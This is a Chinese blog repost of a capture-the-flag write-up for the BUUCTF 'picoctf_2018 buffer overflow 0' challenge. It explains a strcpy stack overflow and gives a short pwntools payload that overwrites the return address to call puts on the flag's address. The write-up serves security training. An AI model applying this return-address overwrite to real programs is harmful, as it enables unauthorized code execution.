欢迎访问 生活随笔!

生活随笔

当前位置: 首页 > 编程资源 > 编程问答 >内容正文

编程问答

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

发布时间:2024/4/17 编程问答 56 豆豆
生活随笔 收集整理的这篇文章主要介绍了 [BUUCTF-pwn]——picoctf_2018_buffer overflow 0 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

好久不写BUU了,手都快生了赶快过来写写。
通过观察源文件发现,首先有put函数不需要去libc中找,同时argv肯定大于1,也就是需要至少两个参数,才可以到else语句,同时vuln函数的参数是第二个参数。

进入vuln函数内部看看,找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出,以此调用puts函数打印flag.因为flag在bss段上。

from pwn import * elf = ELF("./PicoCTF_2018_buffer_overflow_0") payload = 'a' * (0x18 + 4) + p32(elf.plt['puts']) + 'junk' + p32(0x0804A080) print("payload : " + payload)


总结

以上是生活随笔为你收集整理的[BUUCTF-pwn]——picoctf_2018_buffer overflow 0的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。